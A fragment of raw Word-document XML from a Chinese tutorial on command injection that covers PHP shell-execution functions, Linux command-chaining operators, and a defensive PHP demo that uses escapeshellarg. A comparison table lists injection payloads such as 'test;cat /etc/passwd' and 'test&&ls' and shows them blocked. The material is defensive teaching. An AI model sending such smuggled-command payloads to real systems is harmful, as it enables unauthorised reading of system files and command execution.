              </w:rPr>
              <w:t>: ";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echo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multiple_commands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>echo "&lt;/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br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&gt;";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&amp;&amp; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>前成功才执行后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conditional_commands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'cd /var/www &amp;&amp; ls';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echo "&amp;&amp; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>连接符结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>: ";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echo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conditional_commands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>echo "&lt;/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br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&gt;";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|| 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前失败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才执行后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fallback_commands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'cd /path/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>does/not/exist || echo "</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>路径不存在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>"';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echo "|| </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>连接符结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>: ";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echo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fallback_commands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1FD41CF3" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="heading_8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>代码说明</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="7C02B306" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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$command = 'ls /'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：设置查看根目录命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE05E4C" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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exec()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：执行命令，结果存入数组，需打印查看。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E324854" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pP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shell_exec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>：执行命令并返回完整字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D98E8F" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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system()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：直接执行并自动输出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D74A866" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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反引号：功能同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shell_exec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>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CF2C28" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91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;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：顺序执行多条命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122F71B8" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91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&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：前一条执行成功，才执行后一条。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293C4613" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：前一条执行失败，才执行后一条。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE19141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CECFEF8" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="heading_9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1.3 Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>命令连接符实操练习</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="5CE47AD2" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="heading_10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和号操作符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6D7589B6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作用：命令后台运行，不占用终端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27D12E39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B354CE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ping 127.0.0.1 -c 2 &amp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61573D9A" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="heading_11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>分号操作符；</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="676118B5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作用：顺序执行多条命令，互不影响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544804D2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E1846C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echo "</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>命令</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1"; echo "</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>命令</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2"; ls /</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="434A1908" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="heading_12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逻辑与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="5FBE6CAD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作用：前成功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后执行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5DF09EE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00C7B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cd /var/www &amp;&amp; ls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="481362E1" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="heading_13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>逻辑或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> ||</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="65D98E1B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作用：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>前失败</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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后执行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4FFEC91E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6BD34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 xml:space="preserve">cd </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/test123 || echo "</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>目录不存在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EC3721E" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="heading_14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>管道符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> |</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="2D0D0CB8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作用：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>前命令</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>输出作为后命令输入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303B6FC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8BB77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ls -l | grep "Mar"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31043F0D" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="heading_15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>重定向符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; &gt;&gt; &lt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="2A09E90A" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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&gt;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覆盖写入文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398311DA" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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&gt;&gt;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追加写入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBF9BA2" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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&lt;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从文件读取内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222A1DE2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0BB3C3F" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="heading_16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>防御演示：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>repairExec.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>源码与分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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1625BF1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E7F110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获取用户输入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安全过滤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safeInput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escapeshellarg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安全执行命令</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>$command = "grep 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safeInput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/var/log/httpd/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access_log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";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$output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shell_exec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($command);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>echo "</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>执行结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:".$output;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194C1D18" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="heading_17"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>escapeshellarg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> () </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>作用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="1174392B" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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给用户输入自动包裹单引号，变为纯字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9A5B84" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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转义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; | &amp;&amp; || &gt; &lt;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等危险符号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222E61AC" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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使用户输入无法断开命令、无法注入新命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2739789A" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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从根源阻止命令执行漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA96BF9" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="heading_18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>防御效果验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="4E3E6442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访问地址：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01F24C21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C15550" w14:textId="5F3F38A2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1266F7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia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/test_exec/repairExec.php?user_input=test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CC30DFD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页面正常返回日志中含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的记录，无命令注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCAF8FF" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="heading_19"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>注入测试对比</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20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803D08" w14:paraId="1110112F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9E8470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Payload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152B6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无过滤结果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7E93B9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使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线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eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>escapeshellarg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>结果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81F750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结论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450DDE" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="00803D08"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803D08" w14:paraId="210EA941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249B2B" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>test;cat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/passwd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855DC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执行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> cat </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>读取用户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7F575C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仅</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> grep </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>搜索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4B624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防御成功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88325A" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="00803D08"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803D08" w14:paraId="40D03E4A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E76CA3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test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D2025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E2676B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截断执行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> id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10DF86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仅</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> grep </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>搜索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5BA65D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防御成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803D08" w14:paraId="5D9BBA1F" w14:textId="77777777"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9FC9B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test&amp;&amp;ls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22734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执行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
